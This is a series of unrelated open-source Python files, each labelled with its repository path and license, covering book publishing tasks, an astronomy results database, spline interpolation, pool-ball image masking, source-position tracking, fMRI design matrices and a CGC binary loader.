lib/booktype/apps/edit/tasks.py
1
2110
import json import celery import urllib2 import httplib import sputnik from booki.editor import models def fetch_url(url, data): try: data_json = json.dumps(data) except TypeError: return None req = urllib2.Request(url, data_json) req.add_header('Content-Type', 'application/json') req.add_header('Content-Length', len(data_json)) try: r = urllib2.urlopen(req) except (urllib2.HTTPError, urllib2.URLError, httplib.HTTPException): pass except Exception: pass # should really be a loop of some kind try: s = r.read() dta = json.loads(s.strip()) except: return None return dta @celery.task def publish_book(*args, **kwargs): import urllib2 import json import logging # set logger logger = logging.getLogger('booktype') logger.debug(kwargs) book = models.Book.objects.get(id=kwargs['bookid']) data = { "assets" : { "testbook.epub" : "http://127.0.0.1:8000/%s/_export/" % book.url_title }, "input" : "testbook.epub", "outputs": { "two" : { "profile" : "epub", "config": { 'project_id': book.url_title }, "output" : "testbook.epub" } } } logger.debug(data) result = fetch_url('http://127.0.0.1:8000/_convert/', data) logger.debug(result) task_id = result['task_id'] while True: logger.debug('http://127.0.0.1:8000/_convert/%s' % task_id) response = urllib2.urlopen('http://127.0.0.1:8000/_convert/%s' % task_id).read() dta = json.loads(response) logger.debug(dta) sputnik.addMessageToChannel2( kwargs['clientid'], kwargs['sputnikid'], "/booktype/book/%s/%s/" % (book.pk, kwargs['version']), { "command": "publish_progress", "state": dta['state'] }, myself=True ) if dta['state'] in ['SUCCESS', 'FAILURE']: break
agpl-3.0
1,521,317,830,055,630,300
23.264368
88
0.536019
false
3.644214
false
false
false
giacomov/fermi_blind_search
fermi_blind_search/database.py
1
14427
#!/usr/bin/env python from contextlib import contextmanager import argparse import sys import sshtunnel from sqlalchemy import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker from fermi_blind_search.configuration import get_config from fermi_blind_search import myLogging _logger = myLogging.log.getLogger("database") # will store the engine that will connect to the database _engine = None # we need this to handle the tables Base = declarative_base() # defines the class that will connect to the database Session = sessionmaker() @contextmanager def database_connection(config): if config.get("SSH db tunnel", "remote_host") != '': """ As of now, we are not using this in the real time search. Instead we are using an autossh connection to facilitate tunneling. However, we are keeping the code here in case an ssh tunnel needs to be established from a python script in the future. """ with sshtunnel.SSHTunnelForwarder(config.get("SSH db tunnel", "remote_host"), ssh_username=config.get("SSH db tunnel", "username"), host_pkey_directories=[ config.get("SSH db tunnel", "key_directory")], remote_bind_address=('127.0.0.1', int(config.get("SSH db tunnel", "tunnel_port"))), local_bind_address=('localhost', int(config.get('Real time', 'db_port'))), ): db_instance = Database(config) try: yield db_instance except: raise finally: db_instance.close() else: db_instance = Database(config) try: yield db_instance except: raise finally: db_instance.close() class Database(object): def __init__(self, config): global Base global Session global _engine # initialize the engine using parameters from the config file if config.get("Real time", "is_sqlite") == "True": engine_url = "sqlite:///" + config.get("Real time", "db_path") else: engine_url = config.get("Real time", "db_dialect") + "://" + config.get("Real time", "db_username") + ":" + \ config.get("Real time", "db_password") + "@" + config.get("Real time", "db_host") + ":" + \ config.get("Real time", "db_port") + "/" + config.get("Real time", "db_path") _logger.debug("Database engine URL: %s" % engine_url) _engine = create_engine(engine_url) # bind the engine to the Base Base.metadata.bind = _engine # bind the engine to the session Session.configure(bind=_engine) self._config = config def create_tables(self): # create the Analysis and Results tables Base.metadata.create_all(_engine) _logger.info("Successfully created database tables") def delete_analysis_table(self): # drop the table from the DB try: Analysis.__table__.drop() except: try: # another way to drop the table Analysis.__table__.drop(_engine) except: _logger.error('ERROR: Could not delete Analysis Table') raise else: _logger.info("Successfully deleted Analysis table") def delete_results_table(self): # drop the table from the DB try: Results.__table__.drop() except: try: # another way to drop the table Results.__table__.drop(_engine) except: _logger.error('ERROR: Could not delete Results Table') raise else: _logger.info("Successfully delete Results table") def add_analysis(self, analysis_vals): # TODO: which check that analysis_vals contains the correct field? # TODO: do we want to add a check that the analysis doesn't already exist? assert (analysis_vals['met_start'] is not None and analysis_vals['duration'] is not None and analysis_vals['counts'] is not None and analysis_vals['directory'] is not None), \ "One of the parameters to enter the analysis into the database is missing. Parameters are met_start, " \ "duration, counts, and directory" assert isinstance(analysis_vals["counts"], int), "Counts is not an integer" try: # set the values of the analysis to be added to the table new_analysis = Analysis(met_start=analysis_vals['met_start'], duration=analysis_vals['duration'], counts=analysis_vals['counts'], directory=analysis_vals['directory']) _logger.info("Adding this Analysis to the database: %s" % new_analysis) except KeyError: _logger.error('ERROR: The analysis you want to add does not have the proper fields!') raise except: raise else: # open a session, add the analysis to the table, close the session session = Session() session.add(new_analysis) try: session.commit() except: raise else: _logger.debug("Successfully added analysis to db") def update_analysis_counts(self, met_start, duration, new_counts): # open a session with the DB session = Session() # get the analysis to be updated results = session.query(Analysis).filter(Analysis.met_start == met_start).filter( Analysis.duration == duration).all() # check that there is only one analysis that matches these parameters assert len(results) != 0, "Cannot update this analysis because it does not exist" assert len(results) == 1, 'More than one analysis exists with these parameters! This should never happen' analysis = results[0] _logger.info("Updating this analysis: %s to have %s counts" % (analysis, new_counts)) # update the counts column of the analysis in question analysis.counts = new_counts try: # commit the change session.commit() except: raise else: _logger.debug("Successfully updated analysis") def add_candidate(self, candidate_vals): # TODO: which check that condidate_vals contains the correct field? # TODO: do we want to add a check that the candidate doesn't already exist? assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None and candidate_vals['email'] is not None), \ "One of the parameters to enter the candidate into the database is missing. Parameters are ra, dec, " \ "met_start, interval, email" try: # set the values of the result to be added to the table new_candidate = Results(ra=candidate_vals['ra'], dec=candidate_vals['dec'], met_start=candidate_vals['met_start'], interval=candidate_vals['interval'], email=candidate_vals['email']) _logger.info("Adding this result to the database %s" % new_candidate) except KeyError: _logger.error('ERROR: The result you want to add does not have the proper fields') raise except: raise else: # open a session, add the result to the table, close the session session = Session() session.add(new_candidate) try: session.commit() except: raise else: _logger.debug("Successfully added result to database") return new_candidate def get_analysis_between_times(self, start, stop): _logger.info("Fetching analyses using data between %s and %s" % (start, stop)) # open a session session = Session() # get all analyses with met_start or met_stop (met_start + duration) times within the range [start,stop] return session.query(Analysis).filter(or_(and_(Analysis.met_start >= start, Analysis.met_start <= stop), and_(Analysis.met_start + Analysis.duration >= start, Analysis.met_start + Analysis.duration <= stop))).all() def get_exact_analysis(self, start, stop): _logger.info("Fetching analysis with met_start = %s and met_start + duration = %s" % (start, stop)) # open a session session = Session() # get all analyses with start time and stop times exactly matching the parameters return session.query(Analysis).filter(and_(Analysis.met_start == start, Analysis.met_start + Analysis.duration == stop)).all() def get_results(self, candidate_vals): # check that candidate vals has the correct fields to perform a search assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None), \ "One of the parameters to enter the candidate into the database is missing. Parameters are ra, dec, " \ "met_start, interval" # open a session session = Session() # get the tolerance ranges for determining if we have a match ra_tol = float(self._config.get("Real time", "ra_tol")) dec_tol = float(self._config.get("Real time", "dec_tol")) start_tol = float(self._config.get("Real time", "start_tol")) int_tol = float(self._config.get("Real time", "int_tol")) _logger.info("Fetching results within %s of ra, %s of dec, %s of met_start, and %s of interval of %s" % (ra_tol, dec_tol, start_tol, int_tol, candidate_vals)) # get all results that match the passed candidate within a certain tolerance return session.query(Results).filter(and_(candidate_vals['ra'] - ra_tol <= Results.ra, Results.ra <= candidate_vals['ra'] + ra_tol, candidate_vals['dec'] - dec_tol <= Results.dec, Results.dec <= candidate_vals['dec'] + dec_tol, candidate_vals['met_start'] - start_tol <= Results.met_start, Results.met_start <= candidate_vals['met_start'] + start_tol, candidate_vals['interval'] - int_tol <= Results.interval, Results.interval <= candidate_vals['interval'] + int_tol)).all() def get_results_to_email(self): _logger.info("Fetching results with email = False (0 in database)") # open a session session = Session() # get all results that have not been emailed yet return session.query(Results).filter(Results.email == 0).all() def update_result_email(self, candidate, email_val=False): _logger.info("Updating result: %s to have email value: %s" % (candidate, email_val)) # open a session session = Session() # update the value of the candidate candidate.email = email_val try: # commit the change session.commit() except: raise else: _logger.debug("Successfully updated result") def close(self): global _logger _logger.info("Closing database") Session.close_all() class Analysis(Base): # give the table a name __tablename__ = 'analysis' # define the columns of the table met_start = Column(Float(32), Sequence('analysis_met_start_seq'), primary_key=True) duration = Column(Float(32), Sequence('analysis_duration_seq'), primary_key=True) counts = Column(Integer) directory = Column(String(250)) def __repr__(self): # formatting string so that printing rows from the table is more readable return "<Analysis(met_start= %s, duration= %s, counts= %s, directory= %s)>" % \ (self.met_start, self.duration, self.counts, self.directory) class Results(Base): # give the table a name __tablename__ = 'results' # define the columns of the table ra = Column(Float(32)) dec = Column(Float(32)) met_start = Column(Float(32), Sequence('results_met_start_seq'), primary_key=True) interval = Column(Float(32), Sequence('results_interval_seq'), primary_key=True) email = Column(Boolean) def __repr__(self): # formatting string so that printing rows from the table is more readable return "<Results(ra= %s, dec= %s, met_start= %s, interval= %s, email=%s)>" % (self.ra, self.dec, self.met_start, self.interval, self.email) if __name__ == "__main__": # Allows you to quickly delete and re-create the database. parser = argparse.ArgumentParser() parser.add_argument('--config', help='Path to config file', type=get_config, required=True) parser.add_argument('--clear', help="If set, delete the database tables, and recreate them", action="store_true") args = parser.parse_args() configuration = args.config # start db connection db = Database(configuration) if args.clear: # delete the tables db.delete_analysis_table() db.delete_results_table() # re-create the tables db.create_tables()
bsd-3-clause
5,104,153,105,042,348,000
36.375648
121
0.563249
false
4.606322
true
false
false
saisai/algorithms_by_other
splinte-interplation/spline-interpolation.py
1
2896
#!/usr/bin/env python # -*- coding: utf-8 -*- def niceCubicPolynomial(p): tmp = "" if p["a"] == 1: tmp += " x^3" elif p["a"] != 0: tmp += "%.2fx^3" % p["a"] if p["b"] == 1: tmp += "\t+ x^2" elif p["b"] != 0: tmp += "\t+ %.2fx^2" % p["b"] else: tmp += "\t\t" if p["c"] == 1: tmp += "\t+ x" elif p["c"] != 0: tmp += "\t+ %.2fx" % p["c"] else: tmp += "\t\t" if p["d"] != 0: tmp += "\t+ %.2f" % p["d"] return tmp def getSpline(points): """ points should be a list of maps, where each map represents a point and has "x" and "y" """ import numpy, scipy.linalg # sort points by x value points = sorted(points, key=lambda point: point["x"]) n = len(points) - 1 # Set up a system of equations of form Ax=b A = numpy.zeros(shape=(4*n,4*n)) b = numpy.zeros(shape=(4*n,1)) for i in range(0, n): # 2n equations from condtions (S2) A[i][4*i+0] = points[i]["x"]**3 A[i][4*i+1] = points[i]["x"]**2 A[i][4*i+2] = points[i]["x"] A[i][4*i+3] = 1 b[i] = points[i]["y"] A[n+i][4*i+0] = points[i+1]["x"]**3 A[n+i][4*i+1] = points[i+1]["x"]**2 A[n+i][4*i+2] = points[i+1]["x"] A[n+i][4*i+3] = 1 b[n+i] = points[i+1]["y"] # 2n-2 equations for (S3): if i == 0: continue # point i is an inner point A[2*n+(i-1)][4*(i-1)+0] = 3*points[i]["x"]**2 A[2*n+(i-1)][4*(i-1)+1] = 2*points[i]["x"] A[2*n+(i-1)][4*(i-1)+2] = 1 A[2*n+(i-1)][4*(i-1)+0+4] = -3*points[i]["x"]**2 A[2*n+(i-1)][4*(i-1)+1+4] = -2*points[i]["x"] A[2*n+(i-1)][4*(i-1)+2+4] = -1 b[2*n+(i-1)] = 0 A[3*n+(i-1)][4*(i-1)+0] = 6*points[i]["x"] A[3*n+(i-1)][4*(i-1)+1] = 2 A[3*n+(i-1)][4*(i-1)+0+4] = -6*points[i]["x"] A[3*n+(i-1)][4*(i-1)+1+4] = -2 b[3*n+(i-1)] = 0 # Natural spline: A[3*n-1+0][0+0] += 6*points[0]["x"] A[3*n-1+0][0+1] += 2 b[3*n-1+0] += 0 A[3*n+n-1][4*(n-1)+0] += 6*points[n]["x"] A[3*n+n-1][4*(n-1)+1] += 2 b[3*n+n-1] += 0 x = scipy.linalg.solve(A, b) spline = [] for i in range(0, n): spline.append({"u": points[i]["x"], "v": points[i+1]["x"], "a": float(x[4*i+0]), "b": float(x[4*i+1]), "c": float(x[4*i+2]), "d": float(x[4*i+3])}) return spline if __name__ == "__main__": points = [] points.append({"x": 0.0, "y": -4}) points.append({"x": 1.0, "y": 9}) points.append({"x": 2.0, "y": 35}) points.append({"x": 3.0, "y": 70}) spline = getSpline(points) for p in spline: tmp = "[%.2f, %.2f]:" % (p["u"], p["v"]) tmp += niceCubicPolynomial(p) print(tmp)
mit
-5,942,451,878,458,563,000
27.96
66
0.397099
false
2.362153
false
false
false
Edeleon4/PoolShark
scripts/hist.py
1
2214
import cv2 import numpy as np frame = cv2.imread('/mnt/c/Users/T-HUNTEL/Desktop/hackathon/table3.jpg') h,w,c = frame.shape print frame.shape # Convert BGR to HSV hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) BORDER_COLOR = 0 def flood_fill(image, x, y, value): count = 1 points = [(x, y)] "Flood fill on a region of non-BORDER_COLOR pixels." if x >= image.shape[1] or y >= image.shape[0] or image[x,y] == BORDER_COLOR: return None, None edge = [(x, y)] image[x, y] = value while edge: newedge = [] for (x, y) in edge: for (s, t) in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)): if s <= image.shape[1] and y <= image.shape[0] and \ image[s, t] not in (BORDER_COLOR, value): image[s, t] = value points.append((s, t)) count += 1 newedge.append((s, t)) edge = newedge return count, points # thresholds for different balls / background low_bkg = np.array([15, 40, 50], dtype=np.uint8) high_bkg = np.array([40, 190, 200], dtype=np.uint8) lower_blue = np.array([110,50,50], dtype=np.uint8) upper_blue = np.array([130,255,255], dtype=np.uint8) low_yellow = np.array([20, 30, 30], dtype=np.uint8) high_yellow = np.array([30, 255, 255], dtype=np.uint8) # mask out the background mask = cv2.inRange(hsv, low_bkg, high_bkg) mask = np.invert(mask) # Bitwise-AND mask and original image objects = cv2.bitwise_and(frame,frame, mask= mask) hsv = cv2.cvtColor(objects, cv2.COLOR_BGR2HSV) # mask the yellow balls mask = cv2.inRange(hsv, low_yellow, high_yellow) yellows = cv2.bitwise_and(objects, objects, mask=mask) # find the biggest cloud of 1's in the yellow mask biggest_cloud = [] biggest_count = 0 image = mask / 255. while len(np.where(image == 1)[0]) > 0: loc = np.where(image == 1) y = loc[0][0] x = loc[1][0] count, cloud = flood_fill(image, y, x, 2) if count > biggest_count: print count biggest_count = count biggest_cloud = cloud print biggest_cloud print biggest_count cv2.imwrite('mask.jpg', mask) cv2.imwrite('yellows.jpg', yellows) cv2.imwrite('frame.jpg', frame)
mit
-4,887,612,138,901,576,000
25.357143
80
0.604788
false
2.777917
false
false
false
arypbatista/gobspy
gobspyide/common/position.py
1
4075
# -*- coding: utf-8 -*- # # Copyright (C) 2011-2017 Ary Pablo Batista <arypbatista@gmail.com>, Pablo Barenbaum <foones@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os import common.i18n as i18n from common.utils import * #### Tracking of positions inside source files. #### #### ProgramElements are elements inside a program, typically #### tokens or AST nodes. #### #### ProgramAreas are specific regions of the program, such #### as the area after a given token. class ProgramElement(object): """Represents an element inside a program. Subclasses should implement: pos_begin: starting position pos_end: final position description(): human readable description""" def source(self): return self.pos_begin.string[self.pos_begin.start:self.pos_end.start] class Position(object): "Represents a position in a source file or string." def __init__(self, string, filename='...', start=0, row=1, col=1): self.string = string self._filename = filename self.start = start self.row = row self.col = col def after_reading(self, string): """Returns the position that results after reading the characters in the string.""" new_start = self.start + len(string) newlines = string.count('\n') new_row = self.row + newlines if newlines == 0: new_col = self.col + len(string) else: new_col = len(string) - string.rindex('\n') return Position(self.string, self._filename, new_start, new_row, new_col) def __repr__(self): return '%s:%s:%s' % (self._filename, self.row, self.col) def filename(self): return self._filename def row_col(self): return '%s %s, %s %s' % (i18n.i18n('line'), self.row, i18n.i18n('column'), self.col) def file_row_col(self): return '%s (%s)' % (self.filename(), self.row_col()) def file_row(self): return '(%s:%s)' % (self.filename(), self.row) def line_before(self): try: r = self.string.rindex('\n', 0, self.start) res = self.string[r + 1:self.start] except ValueError: res = self.string[:self.start] return expand_tabs(res) def two_lines_after(self): try: r1 = self.string.index('\n', self.start) l1 = self.string[self.start:r1] try: r2 = self.string.index('\n', r1 + 1) l2 = self.string[r1+1:r2] res = [l1, l2] except ValueError: res = [l1] except ValueError: res = [self.string[self.start:]] return map(expand_tabs, res) class ProgramArea(object): "Represents an area of a program." def __repr__(self): return '(...)' class ProgramAreaNear(ProgramArea): """Represents the area of a program that occurs near the beggining of a given program element.""" def __init__(self, elem): self.elem = elem def __repr__(self): l1 = '%s\n%s %s' % (self.elem.pos_begin.file_row_col(), i18n.i18n('near'), self.elem.description()) before = self.elem.pos_begin.line_before() after = self.elem.pos_end.two_lines_after() ind = ' ' * len(before) l2 = ind + '|' + '\n' + ind + 'V' src = self.elem.source() if len(src) < 50: l3 = '%s%s%s' % (before, src, after[0]) if len(after) > 1: l3 += '\n' else: l3 = '%s%s' % (before, src[:50]) if src[-1] != '\n': l3 += '...\n' return '\n'.join(['--', l1, l2, l3, '--']) def interval(self): return self.elem.pos_begin, self.elem.pos_end def filename(self): return self.elem.pos_begin.filename()
gpl-3.0
1,046,354,306,264,107,000
33.82906
103
0.637301
false
3.313008
false
false
false
nistats/nistats
nistats/design_matrix.py
1
17077
""" This module implements fMRI Design Matrix creation. Design matrices are represented by Pandas DataFrames Computations of the different parts of the design matrix are confined to the make_first_level_design_matrix function, that create a DataFrame All the others are ancillary functions. Design matrices contain three different types of regressors: 1. Task-related regressors, that result from the convolution of the experimental paradigm regressors with hemodynamic models A hemodynamic model is one of: - 'spm' : linear filter used in the SPM software - 'glover' : linear filter estimated by G.Glover - 'spm + derivative', 'glover + derivative': the same linear models, plus their time derivative (2 regressors per condition) - 'spm + derivative + dispersion', 'glover + derivative + dispersion': idem plus the derivative wrt the dispersion parameter of the hrf (3 regressors per condition) - 'fir' : finite impulse response model, generic linear filter 2. User-specified regressors, that represent information available on the data, e.g. motion parameters, physiological data resampled at the acquisition rate, or sinusoidal regressors that model the signal at a frequency of interest. 3. Drift regressors, that represent low_frequency phenomena of no interest in the data; they need to be included to reduce variance estimates. Author: Bertrand Thirion, 2009-2015 """ from __future__ import with_statement import sys from warnings import warn import numpy as np import pandas as pd from .experimental_paradigm import check_events from .hemodynamic_models import compute_regressor, _orthogonalize from .utils import full_rank, _basestring ###################################################################### # Ancillary functions ###################################################################### def _poly_drift(order, frame_times): """Create a polynomial drift matrix Parameters ---------- order : int, Number of polynomials in the drift model. frame_times : array of shape(n_scans), Time stamps used to sample polynomials. Returns ------- pol : ndarray, shape(n_scans, order + 1) estimated polynomial drifts plus a constant regressor """ order = int(order) pol = np.zeros((np.size(frame_times), order + 1)) tmax = float(frame_times.max()) for k in range(order + 1): pol[:, k] = (frame_times / tmax) ** k pol = _orthogonalize(pol) pol = np.hstack((pol[:, 1:], pol[:, :1])) return pol def _cosine_drift(high_pass, frame_times): """Create a cosine drift matrix with frequencies or equal to high_pass. Parameters ---------- high_pass : float Cut frequency of the high-pass filter in Hz frame_times : array of shape (n_scans,) The sampling times in seconds Returns ------- cosine_drift : array of shape(n_scans, n_drifts) Cosine drifts plus a constant regressor at cosine_drift[:, -1] Ref: http://en.wikipedia.org/wiki/Discrete_cosine_transform DCT-II """ n_frames = len(frame_times) n_times = np.arange(n_frames) dt = (frame_times[-1] - frame_times[0]) / (n_frames - 1) if high_pass * dt >= .5: warn('High-pass filter will span all accessible frequencies ' 'and saturate the design matrix. ' 'You may want to reduce the high_pass value.' 'The provided value is {0} Hz'.format(high_pass)) order = np.minimum(n_frames - 1, int(np.floor(2 * n_frames * high_pass * dt))) cosine_drift = np.zeros((n_frames, order + 1)) normalizer = np.sqrt(2.0 / n_frames) for k in range(1, order + 1): cosine_drift[:, k - 1] = normalizer * np.cos( (np.pi / n_frames) * (n_times + .5) * k) cosine_drift[:, -1] = 1. return cosine_drift def _none_drift(frame_times): """ Create an intercept vector Returns ------- np.ones_like(frame_times) """ return np.reshape(np.ones_like(frame_times), (np.size(frame_times), 1)) def _make_drift(drift_model, frame_times, order, high_pass): """Create the drift matrix Parameters ---------- drift_model : {'polynomial', 'cosine', None}, string that specifies the desired drift model frame_times : array of shape(n_scans), list of values representing the desired TRs order : int, optional, order of the drift model (in case it is polynomial) high_pass : float, optional, high-pass frequency in case of a cosine model (in Hz) Returns ------- drift : array of shape(n_scans, n_drifts), the drift matrix names : list of length(n_drifts), the associated names """ if isinstance(drift_model, _basestring): drift_model = drift_model.lower() # for robust comparisons if drift_model == 'polynomial': drift = _poly_drift(order, frame_times) elif drift_model == 'cosine': drift = _cosine_drift(high_pass, frame_times) elif drift_model is None: drift = _none_drift(frame_times) else: raise NotImplementedError("Unknown drift model %r" % (drift_model)) names = [] for k in range(1, drift.shape[1]): names.append('drift_%d' % k) names.append('constant') return drift, names def _convolve_regressors(events, hrf_model, frame_times, fir_delays=[0], min_onset=-24, oversampling=50): """ Creation of a matrix that comprises the convolution of the conditions onset with a certain hrf model Parameters ---------- events : DataFrame instance, Events data describing the experimental paradigm see nistats.experimental_paradigm to check the specification for these to be valid paradigm descriptors hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion', 'glover', 'glover + derivative', 'glover + derivative + dispersion', 'fir', None} String that specifies the hemodynamic response function frame_times : array of shape (n_scans,) The targeted timing for the design matrix. fir_delays : array-like of shape (n_onsets,), optional, In case of FIR design, yields the array of delays used in the FIR model (in scans). min_onset : float, optional (default: -24), Minimal onset relative to frame_times[0] (in seconds) events that start before frame_times[0] + min_onset are not considered. oversampling: int optional, default:50, Oversampling factor used in temporal convolutions. Returns ------- regressor_matrix : array of shape (n_scans, n_regressors), Contains the convolved regressors associated with the experimental conditions. regressor_names : list of strings, The regressor names, that depend on the hrf model used if 'glover' or 'spm' then this is identical to the input names if 'glover + derivative' or 'spm + derivative', a second name is output i.e. '#name_derivative' if 'spm + derivative + dispersion' or 'glover + derivative + dispersion', a third name is used, i.e. '#name_dispersion' if 'fir', the regressos are numbered accoding to '#name_#delay' """ regressor_names = [] regressor_matrix = None trial_type, onset, duration, modulation = check_events(events) for condition in np.unique(trial_type): condition_mask = (trial_type == condition) exp_condition = (onset[condition_mask], duration[condition_mask], modulation[condition_mask]) reg, names = compute_regressor( exp_condition, hrf_model, frame_times, con_id=condition, fir_delays=fir_delays, oversampling=oversampling, min_onset=min_onset) regressor_names += names if regressor_matrix is None: regressor_matrix = reg else: regressor_matrix = np.hstack((regressor_matrix, reg)) return regressor_matrix, regressor_names ###################################################################### # Design matrix creation ###################################################################### def make_first_level_design_matrix( frame_times, events=None, hrf_model='glover', drift_model='cosine', high_pass=.01, drift_order=1, fir_delays=[0], add_regs=None, add_reg_names=None, min_onset=-24, oversampling=50): """Generate a design matrix from the input parameters Parameters ---------- frame_times : array of shape (n_frames,) The timing of acquisition of the scans in seconds. events : DataFrame instance, optional Events data that describes the experimental paradigm. The DataFrame instance might have these keys: 'onset': column to specify the start time of each events in seconds. An error is raised if this key is missing. 'trial_type': column to specify per-event experimental conditions identifier. If missing each event are labelled 'dummy' and considered to form a unique condition. 'duration': column to specify the duration of each events in seconds. If missing the duration of each events is set to zero. 'modulation': column to specify the amplitude of each events. If missing the default is set to ones(n_events). An experimental paradigm is valid if it has an 'onset' key and a 'duration' key. If these keys are missing an error will be raised. For the others keys a warning will be displayed. Particular attention should be given to the 'trial_type' key which defines the different conditions in the experimental paradigm. hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion', 'glover', 'glover + derivative', 'glover + derivative + dispersion', 'fir', None}, optional, Specifies the hemodynamic response function drift_model : {'polynomial', 'cosine', None}, optional Specifies the desired drift model, period_cut : float, optional Cut period of the high-pass filter in seconds. Used only if drift_model is 'cosine'. drift_order : int, optional Order of the drift model (in case it is polynomial). fir_delays : array of shape(n_onsets) or list, optional, In case of FIR design, yields the array of delays used in the FIR model (in scans). add_regs : array of shape(n_frames, n_add_reg), optional additional user-supplied regressors, e.g. data driven noise regressors or seed based regressors. add_reg_names : list of (n_add_reg,) strings, optional If None, while add_regs was provided, these will be termed 'reg_%i', i = 0..n_add_reg - 1 min_onset : float, optional Minimal onset relative to frame_times[0] (in seconds) events that start before frame_times[0] + min_onset are not considered. oversampling: int, optional, Oversampling factor used in temporal convolutions. Returns ------- design_matrix : DataFrame instance, holding the computed design matrix, the index being the frames_times and each column a regressor. """ # check arguments # check that additional regressor specification is correct n_add_regs = 0 if add_regs is not None: if add_regs.shape[0] == np.size(add_regs): add_regs = np.reshape(add_regs, (np.size(add_regs), 1)) n_add_regs = add_regs.shape[1] assert add_regs.shape[0] == np.size(frame_times), ValueError( 'Incorrect specification of additional regressors: ' 'length of regressors provided: %d, number of ' 'time-frames: %d' % (add_regs.shape[0], np.size(frame_times))) # check that additional regressor names are well specified if add_reg_names is None: add_reg_names = ['reg%d' % k for k in range(n_add_regs)] elif len(add_reg_names) != n_add_regs: raise ValueError( 'Incorrect number of additional regressor names was provided' '(%d provided, %d expected' % (len(add_reg_names), n_add_regs)) # computation of the matrix names = [] matrix = None # step 1: events-related regressors if events is not None: # create the condition-related regressors if isinstance(hrf_model, _basestring): hrf_model = hrf_model.lower() matrix, names = _convolve_regressors( events, hrf_model, frame_times, fir_delays, min_onset, oversampling) # step 2: additional regressors if add_regs is not None: # add user-supplied regressors and corresponding names if matrix is not None: matrix = np.hstack((matrix, add_regs)) else: matrix = add_regs names += add_reg_names # step 3: drifts drift, dnames = _make_drift(drift_model, frame_times, drift_order, high_pass) if matrix is not None: matrix = np.hstack((matrix, drift)) else: matrix = drift names += dnames # check column names are all unique if len(np.unique(names)) != len(names): raise ValueError('Design matrix columns do not have unique names') # step 4: Force the design matrix to be full rank at working precision matrix, _ = full_rank(matrix) design_matrix = pd.DataFrame( matrix, columns=names, index=frame_times) return design_matrix def check_design_matrix(design_matrix): """ Check that the provided DataFrame is indeed a valid design matrix descriptor, and returns a triplet of fields Parameters ---------- design matrix : pandas DataFrame, Describes a design matrix. Returns ------- frame_times : array of shape (n_frames,), Sampling times of the design matrix in seconds. matrix : array of shape (n_frames, n_regressors), dtype='f' Numerical values for the design matrix. names : array of shape (n_events,), dtype='f' Per-event onset time (in seconds) """ names = [name for name in design_matrix.keys()] frame_times = design_matrix.index matrix = design_matrix.values return frame_times, matrix, names def make_second_level_design_matrix(subjects_label, confounds=None): """Sets up a second level design. Construct a design matrix with an intercept and subject specific confounds. Parameters ---------- subjects_label: list of str Contain subject labels to extract confounders in the right order, corresponding with the images, to create the design matrix. confounds: pandas DataFrame, optional If given, contains at least two columns, 'subject_label' and one confound. The subjects list determines the rows to extract from confounds thanks to its 'subject_label' column. All subjects must have confounds specified. There should be only one row per subject. Returns ------- design_matrix: pandas DataFrame The second level design matrix """ confounds_name = [] if confounds is not None: confounds_name = confounds.columns.tolist() confounds_name.remove('subject_label') design_columns = (confounds_name + ['intercept']) # check column names are unique if len(np.unique(design_columns)) != len(design_columns): raise ValueError('Design matrix columns do not have unique names') # float dtype necessary for linalg design_matrix = pd.DataFrame(columns=design_columns, dtype=float) for ridx, subject_label in enumerate(subjects_label): design_matrix.loc[ridx] = [0] * len(design_columns) design_matrix.loc[ridx, 'intercept'] = 1 if confounds is not None: conrow = confounds['subject_label'] == subject_label if np.sum(conrow) > 1: raise ValueError('confounds contain more than one row for ' 'subject %s' % subject_label) elif np.sum(conrow) == 0: raise ValueError('confounds not specified for subject %s' % subject_label) for conf_name in confounds_name: confounds_value = confounds[conrow][conf_name].values[0] design_matrix.loc[ridx, conf_name] = confounds_value # check design matrix is not singular sys.float_info.epsilon if np.linalg.cond(design_matrix.values) > design_matrix.size: warn('Attention: Design matrix is singular. Aberrant estimates ' 'are expected.') return design_matrix
bsd-3-clause
-7,965,344,307,184,148,000
35.963203
79
0.624758
false
4.033302
false
false
false
angr/cle
cle/backends/cgc/cgc.py
1
1352
from ...address_translator import AT from .. import register_backend from ..elf import ELF from ...patched_stream import PatchedStream ELF_HEADER = bytes.fromhex("7f454c46010101000000000000000000") CGC_HEADER = bytes.fromhex("7f43474301010143014d6572696e6f00") class CGC(ELF): """ Backend to support the CGC elf format used by the Cyber Grand Challenge competition. See : https://github.com/CyberGrandChallenge/libcgcef/blob/master/cgc_executable_format.md """ is_default = True # Tell CLE to automatically consider using the CGC backend def __init__(self, binary, binary_stream, *args, **kwargs): binary_stream = PatchedStream(binary_stream, [(0, ELF_HEADER)]) super().__init__(binary, binary_stream, *args, **kwargs) self.memory.store(AT.from_raw(0, self).to_rva(), CGC_HEADER) # repair the CGC header self.os = 'cgc' self.execstack = True # the stack is always executable in CGC @staticmethod def is_compatible(stream): stream.seek(0) identstring = stream.read(4) stream.seek(0) if identstring.startswith(b'\x7fCGC'): return True return False def _load_segment(self, seg): if seg.header.p_memsz > 0: super()._load_segment(seg) supported_filetypes = ['cgc'] register_backend('cgc', CGC)
bsd-2-clause
-3,029,612,784,850,716,000
32.8
94
0.664201
false
3.414141
false
false
false
crateio/crate.web
crate/web/search/indexes.py
1
2307
